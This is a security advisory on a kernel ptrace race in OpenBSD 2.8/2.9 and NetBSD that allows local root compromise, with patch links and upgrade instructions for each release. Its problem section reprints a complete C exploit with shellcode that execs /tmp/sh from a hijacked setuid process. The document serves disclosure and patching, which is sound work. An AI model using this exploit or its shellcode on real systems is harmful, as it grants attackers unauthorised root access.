COMMAND
	    kernel
SYSTEMS AFFECTED
	    OpenBSD 2.9,2.8, NetBSD
PROBLEM
	    Following is  based on  a Georgi  Guninski security  advisory #47.
	    There is local root compromise in  OpenBSD 2.9, 2.8 due to a  race
	    probably in the kernel.  This is quite similar to the linux kernel
	    race several months ago.
	    By forking a few process it  is possible to attach to +s  pid with
	    ptrace.  The  process seems to  be in a  strange state when  it is
	    attached.  Contrary  to the man  info PT_DETACH allows  specifying
	    an address to which execution is continued.
	    Exploit:
	
	    /* Written by Georgi Guninski http://www.guninski.com
	    Tested on OpenBSD 2.9 and 2.8
	    Works best after reboot - the +s program must not be executed before, seems
	    executes /tmp/sh
	    /tmp/su must be a link to +s program
	    if the +s program has been executed, create and run shell script the size of RAM
	    You may need to type "fg" if the program receives stop signal
	    you may need to run the program several times
	    */
	    #include <stdio.h>
	    #include <fcntl.h>
	    #include <sys/types.h>
	    #include <signal.h>
	    #include <sys/ptrace.h>
	    #include <sys/wait.h>
	    #include <limits.h>
	    #include <errno.h>
	    #include <stdlib.h>
	    #include <machine/reg.h>
	    int me=0;
	    void endit(int x)
	    {
	    if(!me)
	     {
	     printf("exiting\n");
	     exit(0);
	     }
	    }
	    extern char **environ;
	    int main(int ac, char **av)
	    {
	    volatile struct reg pt;
	    //exec "/tmp/sh"
	    char bsdshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
	                      "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
	                      "\xb0\x3b\x50\xcd\x80\x90\x90\x90";
	    int j,status,sig;
	    volatile int done=0;
	    volatile static int done2=0;
	    int pid,pid2,i;
	    int num; // number of processes to fork. 20 works for me on Pentium500
	    int target;
	    char *env1;
	    // address of $joro where execution of shell code begins.may need to be changed
	    unsigned int breakat=0xdfbfddaf;
	    num=20;
	    pid=getpid();
	    if(!getenv("joro"))
	    {
	    setenv("joro",bsdshell,1);
	    if (execle(av[0],"a",NULL,environ))
	     perror("exec");
	    }
	    else
	     breakat=(int)getenv("joro");
	    printf("Written by Georgi Guninski\nShall jump to %x\n",breakat);
	    target=pid;
	    printf("Started pid1=%d target=%d\n",pid,target);
	    for(i=0;i<num;i++)
	     {
	     if (!done)
	      if(! (pid2 = fork()))
	      {
	       signal(SIGURG,&endit);
	       pid2=getpid();
	       while(!done)
	       {
	        if (!ptrace(PT_ATTACH, target,NULL,NULL))
	       {
	       done=1;
	       printf("\nAttached!\n");
	       wait(&status);
	       sig=WSTOPSIG(status);
	      printf("sig=%d %s\n",status,sys_siglist[sig]);
	      ptrace(PT_GETREGS,target,(caddr_t)&pt,NULL);
	      printf("eip=%x esp=%x\n",pt.r_eip,pt.r_esp);
	     me=1;
	     done2 +=1;
	      ptrace(PT_DETACH, target,(caddr_t)breakat,NULL);
	    //sleep(2);
	    kill(0,SIGURG);
	    sleep(4);
	    while(42)
	     kill(target,SIGCONT);
	       }
	      }
	      }
	     }
	    // "/tmp/su" must be symbolic link to +s program .
	    // the program must not be executed before.
	    execle("/tmp/su","/usr/bin/su",NULL,environ);
	    }
	
	    In testing the recent obsd  exploit by Georgi Guninski out,  James
	    Babiak has found out that  my OpenBSD 2.8 box was  not vulnerable.
	    He has come to the conclusion that those boxes with the  stephanie
	    kernel patches  by Mike  Schiffman and  doe are  not vulnerable to
	    this exploit, at least without modifying the exploit itself.   The
	    stephanie patches do  not have hard  link restrictions.   However,
	    on  tested  box  /tmp  is  its  own partition (duh), therefore not
	    allowing You to do a cross-device link.
SOLUTION
	    It been fixed the patch is available:
	
	        ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.8/common/030_kernexc.patch
	        ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.9/common/007_kernexec.patch
	
	    The  fix  has  also  been  committed  to  the  2.8  and 2.9 stable
	    branches.
	    For NetBSD kernel sources must  be updated and a new  kernel built
	    and installed.  The instructions for updating your kernel  sources
	    depend upon which particular NetBSD release you are running.
	    Systems running NetBSD-current dated from before 2001-06-15 should
	    be  upgraded  to  NetBSD-current  dated  2001-06-15 or later.  The
	    following  source  directories  need   to  be  updated  from   the
	    netbsd-current CVS branch (aka HEAD):
	
	        src/sys/compat/netbsd32
	        src/sys/kern
	
	    Alternatively, apply  the following  patch (with  potential offset
	    differences):
	
	        ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2001-009-ptrace-1.5.patch
	
	    Systems running NetBSD 1.5 dated from before 2001-06-17 should  be
	    upgraded from NetBSD 1.5 sources  dated 2001-06-17 or later.   The
	    following  source  directories  need   to  be  updated  from   the
	    netbsd-1-5 CVS branch:
	
	        src/sys/compat/netbsd32
	        src/sys/kern
	
	    Alternatively, apply  the following  patch (with  potential offset
	    differences):
	
	        ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2001-009-ptrace-1.5.patch
	
	    NetBSD 1.5.1 is not vulnerable.
	    It is believed the 1.4 versions are vulnerable to this issue,  but
	    a  working  exploit  could  not  be  produced.   The  following is
	    recommended action for  1.4 systems.   Systems running NetBSD  1.4
	    dated from before  2001-07-19 should be  upgraded from NetBSD  1.4
	    sources dated 2001-07-19 or later.  The following source directory
	    needs to be updated from the netbsd-1-4 CVS branch:
	
	        src/sys/kern
	
	    Alternatively, apply  the following  patch (with  potential offset
	    differences):
	
	        ftp://ftp.netbsd.org/pub/NetBSD/security/patches/SA2001-009-ptrace-1.4.patch